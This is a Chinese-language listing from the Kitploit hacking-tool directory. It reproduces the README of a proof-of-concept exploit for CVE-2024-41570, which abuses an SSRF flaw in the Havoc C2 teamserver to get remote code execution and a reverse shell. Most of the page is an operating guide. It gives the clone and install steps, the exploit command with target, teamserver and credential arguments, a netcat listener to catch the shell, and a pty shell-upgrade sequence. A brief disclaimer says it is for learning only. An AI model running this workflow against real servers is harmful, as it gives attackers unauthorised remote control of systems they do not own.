Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-41570 — 通过WebSocket的自动化反向Shell利用 | 带有RCE的Havoc-C2-SSRF | Kitploit
工具/GitHubGitHub/diemoeve/cve-2024-41570
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

通过WebSocket的自动化反向Shell利用 | 带有RCE的Havoc-C2-SSRF

查看仓库
122141年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-41570 | Havoc C2 SSRF 导致 RCE | 通过 WebSocket 实现自动反向 Shell 利用

本项目提供了一个基于 Python 的概念验证(PoC)脚本,用于利用脆弱的 WebSocket 服务。该脚本自动化了代理注册、WebSocket 有效载荷投递以及远程命令执行,以建立反向 Shell。

功能特性

  • 向目标服务注册一个代理。
  • 打开 WebSocket 并发送握手和认证有效载荷。
  • 通过反向 Shell 远程执行命令。
  • 提供带清晰指引的引导式工作流程。

先决条件

  • 机器上已安装 Python 3.x。
  • 通过运行以下命令安装所需依赖:
    root@kitploit:~
    pip install -r requirements.txt
    

安装

  1. 克隆本仓库:
    root@kitploit:~
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. 进入项目目录:
    root@kitploit:~
    cd CVE-2024-41570
    
  3. 安装依赖:
    root@kitploit:~
    pip install -r requirements.txt
    

使用方法

使用必需参数运行脚本:

root@kitploit:~
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

参数

  • -t:WebSocket 服务器的目标 URL。
  • -i:Havoc 团队服务器的 IP 地址。
  • -p:Havoc 团队服务器的端口。
  • -U:WebSocket 认证的用户名。
  • -P:WebSocket 认证的密码。
  • -l:反向 Shell 的监听 IP(你的机器)。
  • -L:反向 Shell 的监听端口(你的机器)。

示例命令

root@kitploit:~
python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

执行步骤

  1. 确保目标服务正在运行且存在漏洞。
  2. 使用所需参数运行脚本。
  3. 在另一个终端中启动监听器:
    root@kitploit:~
    nc -lvnp <listener_port>
    
  4. 升级 Shell:
    root@kitploit:~
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

依赖项

该脚本需要以下 Python 库:

  • requests
  • pycryptodome

使用以下命令安装:

root@kitploit:~
pip install -r requirements.txt

安全声明

本脚本仅供学习目的使用。请确保你拥有对目标系统进行测试的明确授权。滥用此脚本可能违反法律和道德准则。

参考

灵感来源于 Default Havoc Poc

贡献

欢迎贡献!请随意复刻本仓库并提交拉取请求。

许可证

本项目采用 MIT 许可证。详情请参阅 LICENSE 文件。

下载工具